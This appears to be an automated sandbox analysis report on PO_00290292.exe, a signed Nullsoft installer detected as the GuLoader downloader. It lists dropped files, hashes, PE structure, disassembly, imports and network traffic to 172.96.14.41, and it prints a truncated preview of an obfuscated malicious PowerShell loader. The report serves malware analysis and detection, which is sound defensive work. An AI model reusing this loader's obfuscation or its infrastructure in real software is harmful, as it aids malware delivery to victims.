Preview: @...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Users\user\Desktop\PO_00290292.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):622200
                                                                Entropy (8bit):6.838437002582809
                                                                Encrypted:false
                                                                SSDEEP:12288:Ha6fxHweMUQ40g8wIIyvjzYe+rYEN5ROp2V61/shyx:Ha8QePLawIIfe+364k
                                                                MD5:75467CCB43B0B4E9C00DA1E113D822A2
                                                                SHA1:BD98D3A2F3177332BCDEA40EAE864D61D948F8BC
                                                                SHA-256:1672DDA711832E387CEF6CD9EFD2F5FCE78BFC720313EFD59493E6292D122F40
                                                                SHA-512:5F6386C6AEBB89C58DAC087A454C59D617D3DBC44DC06F7C12A6659433C158ACF6D3991513E47D6FD14C265ED8C60B04EE5B159E0C45C3A31A918A5A0078455C
                                                                Malicious:true
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Temp\nse6573.tmp, Author: Joe Security
                                                                Process:C:\Users\user\Desktop\PO_00290292.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):6656
                                                                Entropy (8bit):5.140229856656103
                                                                Encrypted:false
                                                                SSDEEP:96:J7fhfKaGgchPzxK6bq+pKX6D8ZLidGgmkN738:HbGgGPzxeX6D8ZyGgmkN
                                                                MD5:01E76FE9D2033606A48D4816BD9C2D9D
                                                                SHA1:E46D8A9ED4D5DA220C81BAF5F1FDB94708E9ABA2
                                                                SHA-256:EE052FD5141BF769B841846170AABF0D7C2BB922C74C623C3F109344534F7A70
                                                                SHA-512:62EF7095D1BF53354C20329C2CE8546C277AA0E791839C8A24108A01F9483A953979259E0AD04DBCAB966444EE7CDD340F8C9557BC8F98E9400794F2751DC7E0
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 1%
                                                                Joe Sandbox View:
• Filename: teamviewer_Px-yDq1.exe, Detection: malicious
• Filename: teamviewer_Px-yDq1.exe, Detection: malicious
• Filename: SMGS-RCDU5010031.exe, Detection: malicious
• Filename: SMGS-RCDU5010031.exe, Detection: malicious
• Filename: RC_S23_3274 Or_amento ADP 231019_5_5009.exe, Detection: malicious
• Filename: RC_S23_3274 Or_amento ADP 231019_5_5009.exe, Detection: malicious
• Filename: IMG-2023010_WAA646737kendelsesordningenBalneo.exe, Detection: malicious
• Filename: IMG-2023010_WAA646737kendelsesordningenBalneo.exe, Detection: malicious
• Filename: Pepsico_LLC_RFQ_Information.com.exe, Detection: malicious
• Filename: Pepsico_LLC_RFQ_Information.exe, Detection: malicious
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,..................Rich...........PE..L....z.W...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..L.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\PO_00290292.exe
                                                                File Type:ASCII text, with very long lines (25948), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):25948
                                                                Entropy (8bit):5.5477091710283215
                                                                Encrypted:false
                                                                SSDEEP:384:36dq0MO0QFoK3k8Ae0Z24ftUeQv54J+vkwCc+MMFTbr0UN1DDHa1D0bBJ+mMtz4:6rMO0QFook008gexVCT1Nt61SDMi
                                                                MD5:718548247C1303664965903558D95C2F
                                                                SHA1:37A83A369F564C019D7BDF7CC936A2EAF7C03CE4
                                                                SHA-256:A12EE66022E1C0CFB89FD16745AAFC346D4A475944C4552888096D6DA5823186
                                                                SHA-512:0F7CC73C3407317CF85BE2C5316C8FE547371848494A91B3A95E3E6ECFA0F5BAC0284896DFFFD954F7CD003125D559534A69F783BDA7874CDFF62059454CCFEC
                                                                Malicious:true
                                                                Preview:<#Spejlvende Journaliseringssystems Conservatorial #><#Basilikers Toothcomb Letfordrvelig #>$Portugals = """Ko;SmFOmu RnFac FtTwiStoFonDe OtPAlyInxHui PdSkeInsEr4 F In{ S tv Po fi TupOvaBerGaafomPa(sm[BeS Tt HrPeiAunOsgEv]Ov`$SpSuioBelAnfPsa UlCedTo)Fo;bu.Go`$OvNSkoOprDetNohObuRhm Cb OeLirAal BaTonbodDe Fu=Sk Ru`$ VSSpoAnlVafHeaPulHldRe.CiLHaePrnAsgFatInh M;Ne L Vi Af Ta`$PoD RrAniElf OtSvsPasUnyexs OtSteRimBumreeRetAnsSm Tr=Ch NoNArevvwAp-LaO NbSojOpe DcStt P Tb Ry FtSneVa[Pr]Wh Ud(Le`$miNBioLir VtPahMuuUdm TbSaeperGalAfaInnDedLi Op/ci St2Bo)An; K.Ps`$PrRfioCadUntUme PgAnnGyeovtAn1St6Ug8Ab=Pi' CS AU D'In+ P'EdBUnSSpTBoRUnIThNDoG l'Aa;Af Da Co Im TF FoWarDe( D`$StNEnoChnCyetexNupudeOvccrt FaTanPatPa= U0Pl;No Ho`$NoNByoHjnUtelix Tp OeSoc St FaUnnSvtSy Op-ShlTetRe J`$KoNakoVurActQuh SuBumUdbYeeovrOrlSuaMinCrdcr;Li U`$SeNMaoPinTrePaxAlpspeLocHetSmaUnnBetBa+ro= G2Tr) P{Se Un He He Un Au Ko Ta ar`$PoDDer BiDefTet BsTrsBoyThs BtNaeunmKnmWaeAmtDosCa[ S`$ScNUgoBlnMaeApxEkpCaeRec At HaInne
                                                                Process:C:\Users\user\Desktop\PO_00290292.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):45671
                                                                Entropy (8bit):4.90795232450819
                                                                Encrypted:false
                                                                SSDEEP:768:esbuwu3TGi72cX8yrm7pabOb8XVVGP+P5chQG6LaJ1Lq675HxZRMQJ8D0:esil3TD2O8yrmEdFVLh8YLU1Lq25fRMM
                                                                MD5:A3B99B2106C825413B33478E9973057B
                                                                SHA1:168395C750F8C3ED83129E355AEAB99FF8E2CBD4
                                                                SHA-256:03F143F0013A807841AD608E2E1BBD868E4BE6B1CDA3F2ABEEE13B83EA6D6C0F
                                                                SHA-512:03137A4C651911E42C003859571DC57B96D76002C4A221C23C7139815168402E857DF6FE7BDFDF91618F75E11367C2CBFBA79579AFF147DD2D8F5C4C4B26DE8C
                                                                Malicious:false
                                                                Process:C:\Users\user\Desktop\PO_00290292.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):26429
                                                                Entropy (8bit):4.907195976945197
                                                                Encrypted:false
                                                                SSDEEP:768:x0akO5waWRx/acJalHVyLMtomP6KLx9uQ:WakO2n3/mHVttoI6Ax4Q
                                                                MD5:9DA6E8F56037E6935CB6161A6DFCBF21
                                                                SHA1:5A4B78DF18AFF5367E1BC7B423C0077AEF44283A
                                                                SHA-256:19E727679ED75F15F5762E0EAABBFF42EB1A45A7E1F2689CE03F1147EAEA3D93
                                                                SHA-512:2EB2F4BF87CDEB784F65AA14E4EBA59988B91B8CB220254E0997BE78A669129EC5B123F730B6206042BD65C4F05424494C24FF806A4088DBED72CF5C1A6377CC
                                                                Malicious:false
                                                                Process:C:\Users\user\Desktop\PO_00290292.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):75475
                                                                Entropy (8bit):4.940792498010488
                                                                Encrypted:false
                                                                SSDEEP:1536:Pn0ebls0Q+hOkjmWBenn5z+6NmRbCwGX12gSoQiLgKb5FYMYC:Pnls6h9m3n5aRbCYA5FY4
                                                                MD5:F1285913BD7A50C2D704DC961C188D16
                                                                SHA1:785F2E3A20C671F5B9F1299DCC6570871663C128
                                                                SHA-256:05FFBABD8BF53A9FB30E39E5E7F9CF8A7CFDA60453FE6F85E4F79B7E09055F44
                                                                SHA-512:959D5C22471D2A1DEE641B43D187EFF3D53A1BCB29069764D663C6280975B9EE9F8FAF8EFAF34404D361A9DC6736B1FA1800003CC0CD4ACA3E52744F3A67713F
                                                                Malicious:false
                                                                Process:C:\Users\user\Desktop\PO_00290292.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):371116
                                                                Entropy (8bit):7.85868335109414
                                                                Encrypted:false
                                                                SSDEEP:6144:iNGuGCIM5ZVt80g3j83l5wryMUlsd5o70g8wISgIynvjRLZjajve+rw88EBN5ud4:ia6fxHweMUQ40g8wIIyvjzYe+rYEN5j
                                                                MD5:9B1B97D65493135C635B1A5666771597
                                                                SHA1:EA94964C812958C19070AF90F28D526951FECB40
                                                                SHA-256:DE0E75FCA60CBE4F2DC6A6B3D20BE8F78E40822DD6F6451263252C935145AFBA
                                                                SHA-512:ACAD88A403F8D8329527FBB8081966A62AD23031494D0E9C017188BC63544F94A17A1C8C9AFEE620C061A87FF298208FDA758DF702ECDC168028B0BA171FBD47
                                                                Malicious:true
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement\sarawakese.dri, Author: Joe Security
                                                                Process:C:\Users\user\Desktop\PO_00290292.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):319
                                                                Entropy (8bit):4.271581980615064
                                                                Encrypted:false
                                                                SSDEEP:6:CgT93WAirQXF9hb8HQnOnQm9/LK5RjnzF9slcLDQE0gM/dzJ:CgTNXFLXK1G5lxaU901l
                                                                MD5:45EFD154747B90956D3E892FBA8B6947
                                                                SHA1:4FA5DB84F62A95330F4113B97E34FC2D4C2986FC
                                                                SHA-256:3FAC82F24790DC893C8FBD41E058C06E362F555640F71800302DA23A07A1C2DE
                                                                SHA-512:73493D0A6CC63A4B31024FFF3F693768BE91ABF7DC90AF098DC7B13359F63EA109901249310414C3089D4507334888D25DA37BBB23219AB5E064B1CC4230BB28
                                                                Malicious:false
                                                                Preview:basunengels oldtidsminders brdfrugttrernes stormward urans..dansebulerne svindsottige indregistrere,terminalprocessens bundskraber funktionssymbolerne subumbilical.headworker overstarch quickies hverandres,hooky pirringernes handelshjskole adstringe forskes..tacitness grdekonens fusere zakarias instanding nedrykkende,
                                                                Process:C:\Users\user\Desktop\PO_00290292.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):39
                                                                Entropy (8bit):3.8140156038557316
                                                                Encrypted:false
                                                                SSDEEP:3:dRH+IMqzrOuP:dd+IMqPX
                                                                MD5:482781AEC46A6737943C76FF0B4E2864
                                                                SHA1:F5161E368614B3BD66571E8921F4C2AE01977590
                                                                SHA-256:CFD2A6B98273B5DCB90F313340A1A6B172305893FCC779F2AC26C3C4954EDD02
                                                                SHA-512:4113652C465CCE5BEBB8B5082766D5B4F4C7C20BAFA694A6B2C429C8E96491207B0BEFC142ABF8F8E7C192FD03795724AD134196E9A0289FCEB8D343B14B46D8
                                                                Malicious:false
                                                                Preview:[retsbog]..utilizabilities=releasible..
                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                Entropy (8bit):7.848364686317889
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:PO_00290292.exe
                                                                File size:566'744 bytes
                                                                MD5:cc69508628ade733aa8bd21a0a646514
                                                                SHA1:90a270f4529739d82941c6def0efa77eca1a3b09
                                                                SHA256:f216c47f4a5f65a59ded595d62c2470ceb14cc1c31c3a8b4667b8fc3eb276cc2
                                                                SHA512:c42b7e234dd5473e658687eb6bb1efb9c0dd5742ebdd974242a80c02d01be77305e2522073cc87193fedf02b1c683c48a97d2075a70592356ddc8e216f8e0df0
                                                                SSDEEP:12288:0g8/ZwHctOwMltJy48IpD5W0sV5b0AVsOmFUg93m:KeHckwItJy48IPW0Cj6OWU6m
                                                                TLSH:87C402C679C98CEAF83F49B3B09755791CD86ED672B110FB2B64B38424726838E5F418
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..OP..*_...P...s...P...V...P..Rich.P..........PE..L....z.W.................b...*.......3............@
                                                                Icon Hash:d56c6c51d5ce6d59
                                                                Entrypoint:0x4033b6
                                                                Entrypoint Section:.text
                                                                Digitally signed:true
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x57017AB0 [Sun Apr 3 20:18:56 2016 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:4ea4df5d94204fc550be1874e1b77ea7
                                                                Signature Valid:false
                                                                Signature Issuer:E=Grnttrrestationen@Typicalness.Spi, O=Revne, CN=Revne, L=Valley Forge, S=Pennsylvania, C=US
                                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                Error Number:-2146762487
                                                                Not Before, Not After
                                                                • 10/10/2023 10:33:07 09/10/2026 10:33:07
                                                                Subject Chain
                                                                • E=Grnttrrestationen@Typicalness.Spi, O=Revne, CN=Revne, L=Valley Forge, S=Pennsylvania, C=US
                                                                Version:3
                                                                Thumbprint MD5:68FC36478BF0B5E96292261C3159FA24
                                                                Thumbprint SHA-1:AFE8E8AC4A5209BDF02FD2E0B40D2DAA723C0B9D
                                                                Thumbprint SHA-256:63D19C16B421AD654F8399B0900E9B35C3E6BC5B4818DD0D62160BB6E244089E
                                                                Serial:45F778947B66ED1EA3AE3F7C82961AD8FC899E3D
                                                                Instruction
                                                                sub esp, 000002D4h
                                                                push ebx
                                                                push esi
                                                                push edi
                                                                push 00000020h
                                                                pop edi
                                                                xor ebx, ebx
                                                                push 00008001h
                                                                mov dword ptr [esp+14h], ebx
                                                                mov dword ptr [esp+10h], 0040A230h
                                                                mov dword ptr [esp+1Ch], ebx
                                                                call dword ptr [004080B4h]
                                                                call dword ptr [004080B0h]
                                                                cmp ax, 00000006h
                                                                je 00007F20D48F19C3h
                                                                push ebx
                                                                call 00007F20D48F4B1Ch
                                                                cmp eax, ebx
                                                                je 00007F20D48F19B9h
                                                                push 00000C00h
                                                                call eax
                                                                mov esi, 004082B8h
                                                                push esi
                                                                call 00007F20D48F4A96h
                                                                push esi
                                                                call dword ptr [0040815Ch]
                                                                lea esi, dword ptr [esi+eax+01h]
                                                                cmp byte ptr [esi], 00000000h
                                                                jne 00007F20D48F199Ch
                                                                push ebp
                                                                push 00000009h
                                                                call 00007F20D48F4AEEh
                                                                push 00000007h
                                                                call 00007F20D48F4AE7h
                                                                mov dword ptr [0042A244h], eax
                                                                call dword ptr [0040803Ch]
                                                                push ebx
                                                                call dword ptr [004082A4h]
                                                                mov dword ptr [0042A2F8h], eax
                                                                push ebx
                                                                lea eax, dword ptr [esp+34h]
                                                                push 000002B4h
                                                                push eax
                                                                push ebx
                                                                push 004216E8h
                                                                call dword ptr [00408188h]
                                                                push 0040A384h
                                                                push 00429240h
                                                                call 00007F20D48F46D0h
                                                                call dword ptr [004080ACh]
                                                                mov ebp, 00435000h
                                                                push eax
                                                                push ebp
                                                                call 00007F20D48F46BEh
                                                                push ebx
                                                                call dword ptr [00408174h]
                                                                add word ptr [eax], 0000h
                                                                Programming Language:
                                                                • [EXP] VC++ 6.0 SP5 build 8804
Data directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8504 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x80000 | 0x11180 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x89c08 | 0x9d0 | .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b4 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x615d | 0x6200 | c5c0065fc4c103ac2469dafdce131fb4 | False | 0.6616709183673469 | data | 6.45041359169741 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x13a4 | 0x1400 | 4ac891d4ddf58633f14436f9f80ac6b6 | False | 0.4529296875 | data | 5.163001655755973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x20338 | 0x600 | 66b45fceba0f24d768fb09e0afe23c99 | False | 0.5026041666666666 | data | 3.9824009583068882 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x2b000 | 0x55000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x80000 | 0x11180 | 0x11200 | 154f08293ebbaf4693da668407e6410e | False | 0.1918196852189781 | data | 5.314558177965985 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x801d8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.17950727552348278
RT_DIALOG | 0x90a00 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x90b00 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x90c20 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x90c80 | 0x14 | data | English | United States | 1.15
RT_VERSION | 0x90c98 | 0x1a4 | data | English | United States | 0.5547619047619048
RT_MANIFEST | 0x90e40 | 0x340 | XML 1.0 document, ASCII text, with very long lines (832), with no line terminators | English | United States | 0.5540865384615384

Imports

KERNEL32.dll: SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, CreateFileW, GetFileSize, MoveFileW, SetFileAttributesW, GetModuleFileNameW, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, WaitForSingleObject, GetCurrentProcess, CompareFileTime, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GetDiskFreeSpaceW, lstrlenW, lstrcpynW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll: GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
GDI32.dll: SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll: SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll: RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll: ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll: OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Language of compilation system | Country where language is spoken | Map
English | United States |

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                Jan 24, 2024 09:02:39.132808924 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.132836103 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.132874012 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.132886887 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.132913113 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.132956982 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.132971048 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.132994890 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.133001089 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.133033037 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.133060932 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.133073092 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.133074045 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.133116961 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.133131027 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.133155107 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.133196115 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.133233070 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.133272886 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264233112 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264262915 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264277935 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264313936 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264333010 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264379978 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264391899 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264405966 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264416933 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264426947 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264430046 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264444113 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264460087 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264465094 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264465094 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264472961 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264484882 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264484882 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264497042 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264508963 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264512062 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264524937 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264528990 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264537096 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264552116 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264552116 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264566898 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264578104 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264579058 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264590025 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264599085 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264611006 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264622927 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264626026 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264626026 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264636040 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264642954 CET4970880192.168.2.8172.96.14.41
